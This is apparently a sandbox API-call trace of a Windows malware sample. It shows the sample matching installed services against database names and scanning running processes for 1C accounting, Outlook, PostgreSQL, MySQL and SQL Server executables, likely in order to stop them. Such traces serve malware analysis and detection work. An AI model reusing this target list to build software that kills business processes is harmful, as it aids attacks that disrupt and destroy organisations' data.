	[0060.137] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0060.137] lstrlenW (lpString="DPS") returned 3
	[0060.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0060.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0060.137] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0060.137] lstrlenW (lpString="eventlog") returned 8
	[0060.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0060.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0060.137] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0060.137] lstrlenW (lpString="EventSystem") returned 11
	[0060.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0060.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0060.137] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0060.137] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0060.137] lstrlenW (lpString="gpsvc") returned 5
	[0060.137] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0060.137] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0060.138] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0060.138] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0060.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0060.138] lstrlenW (lpString="iphlpsvc") returned 8
	[0060.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0060.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0060.138] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0060.138] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0060.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0060.138] lstrlenW (lpString="LanmanServer") returned 12
	[0060.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0060.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0060.138] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0060.138] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0060.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0060.138] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0060.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0060.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0060.138] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0060.138] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0060.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0060.138] lstrlenW (lpString="lmhosts") returned 7
	[0060.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0060.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0060.138] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0060.138] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0060.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0060.138] lstrlenW (lpString="MMCSS") returned 5
	[0060.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0060.138] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0060.138] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0060.138] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0060.138] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0060.138] lstrlenW (lpString="MpsSvc") returned 6
	[0060.138] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0060.139] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0060.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0060.139] lstrlenW (lpString="Netman") returned 6
	[0060.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0060.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0060.139] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0060.139] lstrlenW (lpString="netprofm") returned 8
	[0060.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0060.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0060.139] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0060.139] lstrlenW (lpString="NlaSvc") returned 6
	[0060.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0060.139] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0060.139] lstrlenW (lpString="nsi") returned 3
	[0060.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0060.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0060.139] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0060.139] lstrlenW (lpString="PcaSvc") returned 6
	[0060.139] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0060.139] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0060.139] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0060.140] lstrlenW (lpString="PlugPlay") returned 8
	[0060.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0060.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0060.140] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0060.140] lstrlenW (lpString="Power") returned 5
	[0060.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0060.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0060.140] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0060.140] lstrlenW (lpString="ProfSvc") returned 7
	[0060.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0060.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0060.140] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0060.140] lstrlenW (lpString="RpcEptMapper") returned 12
	[0060.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0060.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0060.140] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0060.140] lstrlenW (lpString="RpcSs") returned 5
	[0060.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0060.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0060.140] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0060.140] lstrlenW (lpString="SamSs") returned 5
	[0060.140] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0060.140] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0060.140] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0060.140] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0060.141] lstrlenW (lpString="Schedule") returned 8
	[0060.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0060.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0060.141] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0060.141] lstrlenW (lpString="SENS") returned 4
	[0060.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0060.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0060.141] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0060.141] lstrlenW (lpString="ShellHWDetection") returned 16
	[0060.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0060.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0060.141] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0060.141] lstrlenW (lpString="Spooler") returned 7
	[0060.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0060.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0060.141] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0060.141] lstrlenW (lpString="swprv") returned 5
	[0060.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0060.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0060.141] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0060.141] lstrlenW (lpString="SysMain") returned 7
	[0060.141] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0060.141] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0060.141] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0060.142] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0060.142] lstrlenW (lpString="Themes") returned 6
	[0060.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0060.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0060.142] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0060.142] lstrlenW (lpString="TrkWks") returned 6
	[0060.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0060.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0060.142] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0060.142] lstrlenW (lpString="UxSms") returned 5
	[0060.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0060.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0060.142] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0060.142] lstrlenW (lpString="VSS") returned 3
	[0060.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0060.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0060.142] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0060.142] lstrlenW (lpString="WdiServiceHost") returned 14
	[0060.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0060.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0060.142] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0060.142] lstrlenW (lpString="WdiSystemHost") returned 13
	[0060.142] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0060.142] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0060.142] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0060.143] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0060.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0060.143] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0060.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0060.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0060.143] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0060.143] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0060.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0060.143] lstrlenW (lpString="Winmgmt") returned 7
	[0060.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0060.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0060.143] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0060.143] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0060.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0060.143] lstrlenW (lpString="WPDBusEnum") returned 10
	[0060.143] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0060.143] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0060.143] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0060.143] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0060.143] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0060.143] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4b70c0 | out: hHeap=0x7d60000) returned 1
	[0060.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15c
	[0060.147] Process32FirstW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0060.148] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0060.148] lstrlenW (lpString="System") returned 6
	[0060.148] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0060.148] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0060.148] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0060.148] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0060.148] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0060.148] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0060.148] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0060.148] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0060.149] lstrlenW (lpString="smss.exe") returned 8
	[0060.149] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0060.149] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0060.149] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0060.149] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0060.149] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0060.149] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0060.149] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0060.149] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0060.149] lstrlenW (lpString="csrss.exe") returned 9
	[0060.149] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0060.150] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0060.150] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0060.150] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0060.150] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0060.150] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0060.150] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0060.150] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0060.150] lstrlenW (lpString="wininit.exe") returned 11
	[0060.150] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0060.150] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0060.150] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0060.150] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0060.151] lstrlenW (lpString="csrss.exe") returned 9
	[0060.151] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0060.152] lstrlenW (lpString="winlogon.exe") returned 12
	[0060.152] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0060.152] lstrlenW (lpString="services.exe") returned 12
	[0060.152] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0060.153] lstrlenW (lpString="lsass.exe") returned 9
	[0060.153] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0060.153] lstrlenW (lpString="lsm.exe") returned 7
	[0060.153] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.154] lstrlenW (lpString="svchost.exe") returned 11
	[0060.154] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.154] lstrlenW (lpString="svchost.exe") returned 11
	[0060.154] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.155] lstrlenW (lpString="svchost.exe") returned 11
	[0060.155] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.155] lstrlenW (lpString="svchost.exe") returned 11
	[0060.155] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.156] lstrlenW (lpString="svchost.exe") returned 11
	[0060.156] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0060.156] lstrlenW (lpString="audiodg.exe") returned 11
	[0060.156] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.157] lstrlenW (lpString="svchost.exe") returned 11
	[0060.157] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0060.157] lstrlenW (lpString="svchost.exe") returned 11
	[0060.157] Process32NextW (in: hSnapshot=0x15c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0060.158] lstrlenW (lpString="dwm.exe") returned 7
